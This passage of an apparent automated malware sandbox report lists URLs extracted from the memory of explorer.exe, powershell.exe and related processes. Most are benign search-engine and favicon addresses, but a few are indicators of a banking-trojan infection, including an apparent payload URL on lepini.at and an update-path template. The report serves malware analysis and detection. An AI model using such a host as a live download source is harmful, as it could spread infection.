            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
            Source: explorer.exe, 00000021.00000000.412493518.0000000006100000.00000002.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://busca.orange.es/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
            Source: explorer.exe, 00000021.00000002.1158802140.0000000001464000.00000004.00000020.sdmpString found in binary or memory: http://c56.lepini.at/jvassets/xI/t64.dat6
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://cnet.search.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
            Source: loaddll32.exe, powershell.exe, 0000001A.00000003.397434238.000002A5846A0000.00000004.00000001.sdmp, control.exe, 00000023.00000002.853077488.0000000000FDE000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
            Source: loaddll32.exe, 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, powershell.exe, 0000001A.00000003.397434238.000002A5846A0000.00000004.00000001.sdmp, control.exe, 00000023.00000002.853077488.0000000000FDE000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.419834945.000000000F559000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: powershell.exe, 0000001A.00000003.397786087.000002A59CD6E000.00000004.00000001.sdmpString found in binary or memory: http://crl.micr
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://es.ask.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://find.joins.com/
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
            Source: loaddll32.exe, 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, powershell.exe, 0000001A.00000003.397434238.000002A5846A0000.00000004.00000001.sdmp, control.exe, 00000023.00000002.853077488.0000000000FDE000.00000004.00000001.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
            Source: powershell.exe, 0000001A.00000002.652653486.000002A594731000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
            Source: powershell.exe, 0000001A.00000002.427712389.000002A5848DE000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://rover.ebay.com
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
            Source: powershell.exe, 0000001A.00000002.427201197.000002A5846D1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.about.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.in/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.auone.jp/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.de/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.es/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.in/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.it/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.interpark.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.nate.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.nifty.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.sify.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.yam.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.aol.de/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
            Source: explorer.exe, 00000021.00000000.412493518.0000000006100000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://web.ask.com/
            Source: explorer.exe, 00000021.00000000.412493518.0000000006100000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.com
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
            Source: msapplication.xml.3.drString found in binary or memory: http://www.amazon.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.de/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: powershell.exe, 0000001A.00000002.427712389.000002A5848DE000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.ask.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
